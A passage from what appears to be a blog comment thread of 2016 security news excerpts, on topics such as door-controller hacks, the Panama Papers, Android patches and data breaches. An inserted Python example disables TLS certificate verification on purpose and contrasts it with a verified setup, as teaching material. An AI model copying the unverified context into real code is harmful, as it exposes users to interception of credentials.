    “If not properly remediated, DSC will automatically re-infect the victim by re-dropping the file and re-executing the malware without notifying the user,” Kazanciyan says.

  29. Tomi Engdahl says:

    ‘Devastating’ bug pops secure doors at airports, hospitals
    Hackers don’t need authentication to easily open every door using popular HID controllers.
    http://www.theregister.co.uk/2016/04/04/devastating_bug_pops_secure_doors_at_airports_hospitals/

    Criminals could waltz into secure zones in airports and government facilities by hacking and jamming open doors from remote computers over the Internet, DVLabs researcher Ricky Lawshae says.

    The since-patched vulnerabilities affect HID’s flagship VertX and Edge controllers which are distributed in scores of busy locations and large global enterprises.

    The devices are used in airports including Nanchang Changbei International Airport and the Southern Ohio Medical Center.

    Popping the controllers grants attackers access to locks and alarms, and makes it “impossible” for administrators to regain command of the doors.

    All it takes, Lawshae says, is “a few simple UDP packets” for the “potentially devastating bug” to be exploited. Authentication is not required.

    Lawshae says the attacks, which can open every door in a building, are possible because of a command injection vulnerability in an LED blinking lights service.

    “To make matters worse, the discovery service runs as root, so whatever command we send it will also be run as root, effectively giving us complete control over the device.”

  30. Tomi Engdahl says:

    Mobe and Wi-Fi firms flog your location data to commercial firms, claim reports
    That’s why you’re seeing loads of massage parlour ads
    http://www.theregister.co.uk/2016/04/05/mobile_wifi_firms_sell_your_location_data_advertisers_others/

    Two reports by privacy campaigners into mobile and Wi-Fi services’ location tracking activities have revealed practices of questionable legality and security.

    The studies found that “at best, companies are fulfilling the minimal legal requirements, and at worst could be breaking the law and breaching our right to privacy.”

    The collection and exploitation of traffic and location data is detailed in two reports which are published today. The Open Rights Group (ORG) has provided a 44-page inquiry titled “Cashing in on your mobile?” (PDF), which reports on “how phone companies are exploiting their customers’ data.”

    Pairing up, the advocacy groups have launched Opt Me Out Of Location “to encourage the British public to demand that mobile and Wi-Fi service providers are explicit about what they are asking their customers to opt into and provide clear choices for opting out.”

  31. Tomi Engdahl says:

    ‘Panama papers’ came from e-mail server hack at Mossack Fonseca
    Money-shuttling firm lost 2.6 TB of data and didn’t even notice
    http://www.theregister.co.uk/2016/04/05/email_server_hack_led_to_mossack_fonseca_leak/

    The staggering, Wikileaks-beating “Panama Papers” data exfiltration has been attributed to the breach of an e-mail server last year.

    The leak of documents from Panama-based, internationally-franchised firm Mossack Fonseca appears to confirm what has long been suspected but rarely proven: well-heeled politicians, businesses, investors, and criminals use haven-registered businesses to hide their wealth from the public and from taxmen.

    Bloomberg says co-founder Ramon Fonseca told Panama’s Channel 2 the leaked documents are authentic and were “obtained illegally by hackers”.

    According to The Spanish, the whistleblower (here in Spanish) accessed the vast trove of documents by breaching Mossack Fonseca’s e-mail server, with the company sending a message to clients saying it’s investigating how the breach happened, and explaining that it’s taking “all necessary steps to prevent it happening again”.

  32. Tomi Engdahl says:

    Microsoft account-hijacking hole closed 48 hours after bug report
    Token-harvesting attack meant one login could open doors to multiple Microsoft services
    http://www.theregister.co.uk/2016/04/05/microsoft_brews_serves_accounthijack_hole_patch_in_two_days/

    British researcher Jack Whitton has reported a Microsoft account hijacking authentication bug that would have been another arrow in an attacker’s phishing quiver, save for the fact that Microsoft fixed it.

    Whitton quietly reported the flaw to Microsoft which pounced and took only two days to process and patch the flaw.

  33. Tomi Engdahl says:

    Android gets larger-than-usual patch bundle as researchers get to work
    Monthly update goes out to Nexus owners, a few others
    http://www.theregister.co.uk/2016/04/05/android_security_patch/

    As a further sign that researchers are getting serious about finding holes in Android operating systems, Google has released one of its biggest ever monthly patch bundles, with 39 flaws fixed.

    “The most severe of these issues is a Critical security vulnerability that could enable remote code execution on an affected device through multiple methods such as email, web browsing, and MMS when processing media files,” the update states. “There have been no reports of active customer exploitation or abuse of the other newly reported issues.”

  34. Tomi Engdahl says:

    Beware of Unverified TLS Certificates in PHP & Python
    https://blog.sucuri.net/2016/03/beware-unverified-tls-certificates-php-python.html

    Web developers today rely on various third-party APIs. For example, these APIs allow you to accept credit card payments, integrate a social network with your website, or clear your CDN’s cache. The HTTPS protocol is used to secure the connection with the API server. However, if your web app doesn’t verify the TLS certificate, a malicious person can steal your passwords or your customers’ credit card numbers.

    When implemented correctly, the TLS protocol provides both encryption and authentication. The connection between your server and the API server is encrypted using a symmetric cipher (typically AES) so an eavesdropper cannot read your data. The server also confirms its identity (authenticates itself) by sending an X.509 certificate to the client. The client must verify the certificate’s signature against the list of known root certificates, but this step is often neglected. As a result, a man-in-the-middle attack becomes possible.

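The neglected verification step the Sucuri post describes, shown in Python's standard `ssl` module as an added example (not code from the post or its authors): the weak client configuration beside the corrected one, plus a small check that refuses to call an API through a context that would accept a man-in-the-middle. `API_URL` is a hypothetical placeholder endpoint.

```python
import ssl
import urllib.request
from typing import List, Optional

# Added example, not code from the Sucuri post.  Contrasts the unverified TLS
# client the post warns about with the verified form, and audits a context
# before it is used so the missing step cannot slip into production silently.

API_URL = "https://api.example.invalid/v1/charge"  # hypothetical placeholder


def unverified_context() -> ssl.SSLContext:
    """The weak setting: the session is encrypted (AES etc.) but the server is
    never authenticated, so any certificate presented by an on-path attacker is
    accepted.  Equivalent in spirit to requests.get(url, verify=False) or to
    PHP's CURLOPT_SSL_VERIFYPEER => false."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False       # must be cleared before verify_mode can drop
    ctx.verify_mode = ssl.CERT_NONE  # chain is no longer checked against roots
    return ctx


def verified_context(cafile: Optional[str] = None) -> ssl.SSLContext:
    """The corrected setting: certificate chain validated against trusted root
    certificates and the certificate's name matched to the host connected to."""
    ctx = ssl.create_default_context(cafile=cafile)
    # create_default_context() already sets these; restated so the intent is
    # explicit to anyone reviewing the code.
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.check_hostname = True
    return ctx


def verification_gaps(ctx: ssl.SSLContext) -> List[str]:
    """Return every reason the given context would accept a man-in-the-middle;
    an empty list means the peer is authenticated."""
    gaps = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        gaps.append("certificate chain not validated (verify_mode != CERT_REQUIRED)")
    if not ctx.check_hostname:
        gaps.append("certificate name not matched to host (check_hostname off)")
    return gaps


def call_api(url: str = API_URL, ctx: Optional[ssl.SSLContext] = None) -> bytes:
    """Fetch url over HTTPS, but refuse before any network traffic if the
    context would not authenticate the API server."""
    ctx = ctx or verified_context()
    gaps = verification_gaps(ctx)
    if gaps:
        raise ValueError("refusing unverified TLS: " + "; ".join(gaps))
    with urllib.request.urlopen(url, context=ctx, timeout=10) as resp:
        return resp.read()


if __name__ == "__main__":
    print("unverified:", verification_gaps(unverified_context()))
    print("verified:  ", verification_gaps(verified_context()))
```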
  35. Tomi Engdahl says:

    FBI Says a Mysterious Hacking Group Has Had Access to US Govt Files for Years
    http://motherboard.vice.com/read/fbi-flash-alert-hacking-group-has-had-access-to-us-govt-files-for-years

    The feds warned that “a group of malicious cyber actors,” whom security experts believe to be the government-sponsored hacking group known as APT6, “have compromised and stolen sensitive information from various government and commercial networks” since at least 2011, according to an FBI alert obtained by Motherboard.

    The alert, which is also available online, shows that foreign government hackers are still successfully hacking and stealing data from the US government’s servers, their activities going unnoticed for years. This comes months after the US government revealed that a group of hackers, widely believed to be working for the Chinese government, had for more than a year infiltrated the computer systems of the Office of Personnel Management, or OPM. In the process, they stole highly sensitive data about several millions of government workers and even spies.

    In the alert, the FBI lists a long series of websites used as command and control servers to launch phishing attacks “in furtherance of computer network exploitation (CNE) activities [read: hacking] in the United States and abroad since at least 2011.”

    Domains controlled by the hackers were “suspended” as of late December 2015, according to the alert, but it’s unclear if the hackers have been pushed out or they are still inside the hacked networks.

    “Anybody who’s been in that network all this long, they could be anywhere and everywhere.”

    FBI CYWATCH A-000067-DM
    https://otx.alienvault.com/pulse/56c4d1664637f26ad04e5b73/

    The FBI has obtained and validated information regarding a group of malicious cyber actors who have compromised and stolen sensitive information from various government and commercial networks. This group utilized the domains listed herein in furtherance of computer network exploitation (CNE) activities in the United States and abroad since at least 2011.

  36. Tomi Engdahl says:

    China Censors Online Discussion About Panama Papers
    https://yro.slashdot.org/story/16/04/05/0233217/china-censors-online-discussion-about-panama-papers

    China appears to be censoring social media posts on the Panama Papers document leak which has named several members of China’s elite, including President Xi Jinping’s brother-in-law. Hundreds of posts on networks such as Sina Weibo and Wechat on the topic have been deleted since Monday morning.

    Panama Papers: Data Leak Exposes Massive Official Corruption
    https://politics.slashdot.org/story/16/04/03/2026258/panama-papers-data-leak-exposes-massive-official-corruption

    The hidden wealth of some of the world’s most prominent leaders, politicians and celebrities has been revealed by an unprecedented leak of millions of documents that show the myriad ways in which the rich can exploit secretive offshore tax regimes. The Guardian, working with global partners, will set out details from the first tranche of what are being called “the Panama Papers”. Journalists from more than 80 countries have been reviewing 11.5m files leaked from the database of Mossack Fonseca, the world’s fourth biggest offshore law firm.

  37. Tomi Engdahl says:

    Top Story: Cybersecurity experts warn that 75% of mobile apps are vulnerable to attack
    http://www.komando.com/happening-now/348073/75-percent-of-mobile-apps-are-vulnerable-to-attack?elq_mid=7882&elq_cid=546544

    Just like consumers are focusing more on mobile gadgets with each passing year, so are hackers. After all, your smartphone or tablet potentially contains browsing history, banking information, location history, text messages, photos and plenty more hackers can use to steal your identity and money.

    Plus, from the hacker’s perspective, mobile gadget security isn’t quite as advanced as computer security. While gadgets’ built-in mobile security continues to improve, a lot of it relies on keeping malicious apps out of the various app stores. Unfortunately, that doesn’t always work so well.

    Hackers still do slip malicious apps into legitimate app stores. Plus, on Android, which can install apps from any source, there are plenty of third-party app stores just teeming with malicious apps. Hackers can even trick you into installing a malicious app from a text message.

    In addition to malicious apps, there are a lot of legitimate apps out there that have flaws hackers can exploit. Because apps are so easy to make, a lot of app developers don’t have a background in security and don’t even think about it. Or they use code libraries that have flaws already in them.

    So it isn’t a surprise that in its Cyber Risk Report for 2016, Hewlett Packard Enterprise found that 75% of the mobile apps it scanned contained a “critical or high-severity” vulnerability.

    In fact, HPE doesn’t say if it only scanned apps from official app stores, or included third-party app stores as well.

    The most common mobile app flaws HPE found relate to internal worries, such as unencrypted storage (75%), the inability to tell the gadget is jailbroken or rooted (72%), misused push notifications (65%), location tracking (54%) and so forth.

    The biggest “critical-severity vulnerability” HPE found showed up in 30% of the apps, and it’s “Insecure Transport.” That means the app’s Internet communication isn’t encrypted or uses old or weak encryption, like old versions of OpenSSL (this was the flaw behind Heartbleed in 2014).

    The second most common critical flaw is “Privacy Violation” (29%), which is apps reading too much information.

  38. Tomi Engdahl says:

    How Reporters Pulled Off the Panama Papers, the Biggest Leak in Whistleblower History
    http://www.wired.com/2016/04/reporters-pulled-off-panama-papers-biggest-leak-whistleblower-history/

    When Daniel Ellsberg photocopied and leaked the Pentagon Papers to the New York Times in 1971, those 7,000 pages of top secret Vietnam War documents represented what was then the biggest whistleblower leak in history—a couple dozen megabytes if it were contained in a modern text file. Almost four decades later, WikiLeaks in 2010 published Cablegate, a world-shaking, 1.73 gigabyte collection of classified State Department communications that was almost a hundred times bigger.

    If there’s some Moore’s Law of Leaks, however, it seems to be exponential. Just five years have passed since WikiLeaks’ Cablegate coup, and now the world is grappling with a whistleblower megaleak on a scale never seen before: 2.6 terabytes, well over a thousandfold larger.

    On Sunday, more than a hundred media outlets around the world, coordinated by the Washington, DC-based International Consortium of Investigative Journalists, released stories on the Panama Papers, a gargantuan collection of leaked documents exposing a widespread system of global tax evasion. The leak includes more than 4.8 million emails, 3 million database files, and 2.1 million PDFs from the Panamanian law firm Mossack Fonseca that, according to analysis of the leaked documents, appears to specialize in creating shell companies that its clients have used to hide their assets.

    “This is pretty much every document from this firm over a 40-year period,”

    The source warned that his or her ‘life is in danger,’ was only willing to communicate via encrypted channels, and refused to meet in person.

    Neither the ICIJ nor any of the reporters it’s worked with have made the leaked data public. But the scandal resulting from their reporting has already touched celebrities, athletes, business executives and world leaders.

    Icelandic Prime Minister Sigmundur Gunnlaugsson is facing demands from the previous Icelandic prime minister that he resign.

    But beyond those revelations—and there will likely be more as the reporting around the Panama Papers continues—the leak represents an unprecedented story in itself: How an anonymous whistleblower was able to spirit out and surreptitiously send journalists a gargantuan collection of files, which were then analyzed by more than 400 reporters in secret over more than a year before a coordinated effort to go public.

    The Panama Papers leak began, according to ICIJ director Ryle, in late 2014, when an unknown source reached out to the German newspaper Suddeutsche Zeitung, which had reported previously on a smaller leak of Mossack Fonseca files to German government regulators.

    “How much data are we talking about?” Obermayer asked.

    “More than you have ever seen,” the source responded, according to Obermayer.

    Obermayer tells WIRED he communicated with his source over a series of encrypted channels that they frequently changed, each time deleting all history from their prior exchange. He alludes to crypto apps like Signal and Threema, as well as PGP-encrypted email but declines to say specifically which methods they used.

    After seeing a portion of the documents, Suddeutsche Zeitung contacted the ICIJ.

    Meanwhile, the shipments of leaked data continued piecemeal. “Over time we got more and more until we had all 11.5 million documents,” Ryle says.

    “I learned a lot about making the safe transfer of big files,”

    “We’re not WikiLeaks. We’re trying to show that journalism can be done responsibly.” – ICIJ Director Gerard Ryle

    The ICIJ’s developers then built a two-factor-authentication-protected search engine for the leaked documents, the URL for which they shared via encrypted email with scores of news outlets.

    The site even featured a real-time chat system, so that reporters could exchange tips and find translation for documents.

    You could see who was awake and working and communicate openly. We encouraged everyone to tell everyone what they were doing

    Remarkably, despite all that broad access and openness, the full leaked database has yet to leak to the public—perhaps in part because it’s so large and unwieldy.

    Ryle says that the media organizations have no plans to release the full dataset, WikiLeaks-style, which he argues would expose the sensitive information of innocent private individuals along with the public figures on which the group’s reporting has focused.

    The leaks are bound to cause ripples around the world—not least of all for Mossack Fonseca itself.

    Mossack Fonseca and its customers won’t be the last to face an embarrassing or even incriminating megaleak. Encryption and anonymity tools like Tor have only become more widespread and easy to use, making it safer in some ways than ever before for sources to reach out to journalists across the globe. Data is more easily transferred—and with tools like Onionshare, more easily securely transferred—than ever before.

    The new era of megaleaks is already underway: The Panama Papers represent the fourth tax haven leak coordinated by the ICIJ since just 2013.

  39. Tomi Engdahl says:

    Security News This Week: Clever Malware Is Sending People Fake Speeding Tickets
    http://www.wired.com/2016/04/security-news-week-clever-malware-sending-people-fake-speeding-tickets/

    This week, the Apple-FBI legal fight finally, officially ended, as the feds at last found a way into San Bernardino shooter Syed Farook’s locked iPhone. Don’t get too comfortable, though, because this generation’s war between law enforcement and encryption technology has only just begun. They’ve still got lots of drug cases—the most common crime associated with requests to unlock phones—to crack, after all.

    Elsewhere, we looked at how ISIS succeeds at social media, and at why the Department of Justice’s strategy of charging individuals, rather than nations, for hacking these here United States might backfire.

  40. Tomi Engdahl says:

    Sources: Trump Hotels Breached Again
    http://krebsonsecurity.com/2016/04/sources-trump-hotels-breached-again/

    Banking industry sources tell KrebsOnSecurity that the Trump Hotel Collection — a string of luxury properties tied to business magnate and Republican presidential candidate Donald Trump — appears to be dealing with another breach of its credit card systems. If confirmed, this would be the second such breach at the Trump properties in less than a year.

    A representative from Trump Hotels said the organization was investigating the claims.

    On July 1, 2015, this publication was the first to report that banks suspected a breach at Trump properties.

    The hospitality industry has been hit hard by card breaches over the past two years.

    Like most other current presidential candidates, Mr. Trump has offered little in the way of a policy playbook on cybersecurity. But in statements last month, Trump bashed the United States as “obsolete” on cybersecurity, and suggested the country is being “toyed with” by adversaries from China, Russia and elsewhere.

    “We’re so obsolete in cyber,” Trump told The New York Times. “We’re the ones that sort of were very much involved with the creation, but we’re so obsolete.”

  41. Tomi Engdahl says:

    UK journalist to appeal as Seoul blocks his site on N. Korea
    http://bigstory.ap.org/article/55017001b152440395d99e777a047e47/journalist-appeal-after-seoul-blocks-site-north-korea

    A British journalist who runs a website that documents North Korean technology issues said Tuesday that he’ll appeal a decision by South Korean authorities to block his site for allegedly violating the country’s National Security Law.

    Martyn Williams, whose North Korea Tech website has been blocked in South Korea for almost two weeks, said the site does not violate the security law, which bans praising, sympathizing or cooperating with North Korea. The website “doesn’t seek to glorify or support North Korea,” Williams, who is based in San Francisco, said in an email.

    Williams has written about issues ranging from cellphone usage in North Korea and its satellite technology, to a little-known computer operating system developed by North Koreans.

  42. Tomi Engdahl says:

    Cade Metz / Wired:
    WhatsApp says it has enabled end-to-end encryption for all forms of communications on its service, which now has over a billion users, by default — Forget Apple vs. the FBI: WhatsApp Just Switched on Encryption for a Billion People — For most of the past six weeks …

    Forget Apple vs. the FBI: WhatsApp Just Switched on Encryption for a Billion People
    http://www.wired.com/2016/04/forget-apple-vs-fbi-whatsapp-just-switched-encryption-billion-people/

    Mountain View is home to WhatsApp, an online messaging service now owned by tech giant Facebook, that has grown into one of the world’s most important applications. More than a billion people trade messages, make phone calls, send photos, and swap videos using the service. This means that only Facebook itself runs a larger self-contained communications network. And today, the enigmatic founders of WhatsApp, Brian Acton and Jan Koum, together with a high-minded coder and cryptographer who goes by the pseudonym Moxie Marlinspike, revealed that the company has added end-to-end encryption to every form of communication on its service.

  43. Tomi Engdahl says:

    Bug Bounty Guru Katie Moussouris Will Help Hackers and Companies Play Nice
    http://www.wired.com/2016/04/bug-bounty-guru-katie-moussouris-will-help-hackers-companies-play-nice/

    As chief policy officer at HackerOne, Katie Moussouris helped the Defense Department launch its Hack-the-Pentagon program—the first federal bug bounty program that promises to pay hackers who uncover vulnerabilities in the DoD’s public-facing web sites. That was after spending three years to convince Microsoft to launch its first bug bounty program in 2013. And now Moussouris is branching out as an independent consultant to help companies and organizations interested in launching bug bounty programs move from the thinking stage to the doing phase.

    “There’s huge momentum not just in the government space, but in private industry, where you’re seeing all types of vendors, not just tech vendors, … working with hackers,” she says. From medical device manufacturers and healthcare organizations to car companies and home appliance makers, companies that never considered themselves software vendors are now having to grapple with some of the same issues that Microsoft and Google face. As they add more digital code to their products, they have to worry about software vulnerabilities and patches. With that comes an increasing need to work respectfully with the community of white hat hackers and researchers who find and report vulnerabilities to them.

    “We are riding this big wave where hackers are more and more being viewed as helpful as opposed to harmful,” she says. “That’s where I want to help.”

  44. Tomi Engdahl says:

    Cade Metz / Wired:
    WhatsApp says it has enabled end-to-end encryption for all forms of communication on its service, which now has over a billion users, by default — Forget Apple vs. the FBI: WhatsApp Just Switched on Encryption for a Billion People — For most of the past six weeks …

    Forget Apple vs. the FBI: WhatsApp Just Switched on Encryption for a Billion People
    http://www.wired.com/2016/04/forget-apple-vs-fbi-whatsapp-just-switched-encryption-billion-people/

  45. Tomi Engdahl says:

    Google’s Nexus security update for April fixes 8 critical Android bugs
    http://techcrunch.com/2016/04/04/googles-april-nexus-security-update-fixes-8-critical-android-bugs/

    Google is releasing the monthly security update for its Nexus Android devices today and with it, it is also announcing a list of the security vulnerabilities it has patched in this release. This month, the update includes patches for eight critical bugs, including one that affects the infamous libstagefright library, which has already seen its fair share of well-publicized vulnerabilities.

    Google notified its partners about all the issues in this new bulletin two weeks ago and for them (and anybody else who is interested), source code patches will be made available through the Android Open Source Project in the next two days.

    Nexus Security Bulletin—April 2016
    http://source.android.com/security/bulletin/2016-04-02.html

    The most severe of these issues is a Critical security vulnerability that could enable remote code execution on an affected device through multiple methods such as email, web browsing, and MMS when processing media files.

    Android Security Advisory 2016-03-18 previously discussed use of CVE-2015-1805 by a rooting application. CVE-2015-1805 is resolved in this update.

    The “Stagefright” hole in Android – what you need to know
    https://nakedsecurity.sophos.com/2015/07/28/the-stagefright-hole-in-android-what-you-need-to-know/
    Stagefright Detector
    https://play.google.com/store/apps/details?id=com.zimperium.stagefrightdetector

  46. Tomi Engdahl says:

    Turkish Citizenship Database Leak (Corrected and Updated)
    http://www.databreaches.net/turkish-citizenship-database-leak/

    Who would have imagined that backwards ideologies, cronyism and rising religious extremism in Turkey would lead to a crumbling and vulnerable technical infrastructure?

    This paste with a link to a 6.6 GB file, purportedly containing clear-text information on 49,611,709 Turkish citizens, including the following details:

    National Identifier (TC Kimlik No)
    First Name
    Last Name
    Mother’s First Name
    Father’s First Name
    Gender
    City of Birth
    Date of Birth
    ID Registration City and District
    Full Address

    The hackers left a terse message:

    Lesson to learn for Turkey:

    Bit shifting isn’t encryption.
    Index your database. We had to fix your sloppy DB work.
    Putting a hardcoded password on the UI hardly does anything for security.
    Do something about Erdogan! He is destroying your country beyond recognition.

    Lessons for the US? We really shouldn’t elect Trump, that guy sounds like he knows even less about running a country than Erdogan does.

  47. Tomi Engdahl says:

    NoScript and other popular Firefox add-ons open millions to new attack
    Unlike many browsers, Firefox doesn’t always isolate an add-on’s functions.
    http://arstechnica.com/security/2016/04/noscript-and-other-popular-firefox-add-ons-open-millions-to-new-attack/

    NoScript, Firebug, and other popular Firefox add-on extensions are opening millions of end users to a new type of attack that can surreptitiously execute malicious code and steal sensitive data, a team of researchers reported.

    The attack is made possible by a lack of isolation in Firefox among various add-ons installed by an end user. The underlying weakness has been described as an extension reuse vulnerability because it allows an attacker-developed add-on to conceal its malicious behavior by invoking the capabilities of other add-ons. Instead of directly causing a computer to visit a booby-trapped website or download malicious files, the add-on exploits vulnerabilities in popular third-party add-ons that allow the same nefarious actions to be carried out. Nine of the top 10 most popular Firefox add-ons contain exploitable vulnerabilities. By piggybacking off the capabilities of trusted third-party add-ons, the malicious add-on faces much better odds of not being detected.

    The researchers noted that attackers must clear several hurdles for their malicious add-on to succeed. First, someone must go through the trouble of installing the trojanized extension. Second, the computer that downloads it must have enough vulnerable third-party add-ons installed to achieve the attackers’ objective. Still, the abundance of vulnerable add-ons makes the odds favor attackers, at least in many scenarios.

  48. Tomi Engdahl says:

    WhatsApp is now most widely used end-to-end crypto tool on the planet
    WhatsApp now uses Signal protocol, which was largely funded by US taxpayers.
    http://arstechnica.com/tech-policy/2016/04/whatsapp-is-now-most-widely-used-end-to-end-crypto-tool-on-the-planet/

    WhatsApp has enabled end-to-end encryption across all versions of its messaging and voice calling software, according to a Tuesday announcement on the company’s website.

    Given that WhatsApp is already in use by over 1 billion people worldwide, as users upgrade to the latest version, it will become the most widely used end-to-end crypto tool.

    “We live in a world where more of our data is digitized than ever before,” Jan Koum, a WhatsApp co-founder, wrote in a company blog post on Tuesday. “Every day we see stories about sensitive records being improperly accessed or stolen. And if nothing is done, more of people’s digital information and communication will be vulnerable to attack in the years to come. Fortunately, end-to-end encryption protects us from these vulnerabilities.”

  49. Tomi Engdahl says:

    Adobe preps emergency Flash patch for bug hackers are exploiting
    As if the world needed yet another reason to finally flush Flash forever
    http://www.theregister.co.uk/2016/04/06/adobe_prepping_outofband_flash_patch/

    Adobe will this week issue an out-of-band patch for Flash after spotting a critical flaw that is now being “actively exploited” in the wild.

    The flaw, CVE-2016-1019, affects Flash Player version 20.0.0.306 and older for Windows, OS X, Linux, and Chrome OS. Adobe made the jump to patch after learning that users of Windows 7 and Windows XP are being actively targeted by malware writers exploiting the flaw. It hopes to have the fix out by April 7 or as soon as possible afterwards.

  50. Tomi Engdahl says:

    Hacked-corporate-email-as-a-service costs just US$500 a seat!
    Email’s cheap, but cracked Australian credit cards remain the world’s most expensive
    http://www.theregister.co.uk/2016/04/06/crims_will_quietly_hack_any_corporate_email_account_for_500/

    Want to read a business rival’s email? Dell wonks say hacked-corporate-email-as-a-service operators can deliver for just US$500.

    That low, low price is offered by one accomplished hacker on a popular cyber crime forum and detailed in a Secure Works report on the cost of hacking services.

    The hacker charges less for raiding personal email and social media accounts with popped Gmail, Facebook, Hotmail, and Yahoo! accounts costing US$129.

    Buyers are told how the hacker has pulled off the exploitation which they boast does not involve changing passwords and will not be detected by victims.

    https://www.secureworks.com/~/media/Files/US/Reports/SecureWorksSECO2123NUndergroundHackerMarketplace.ashx
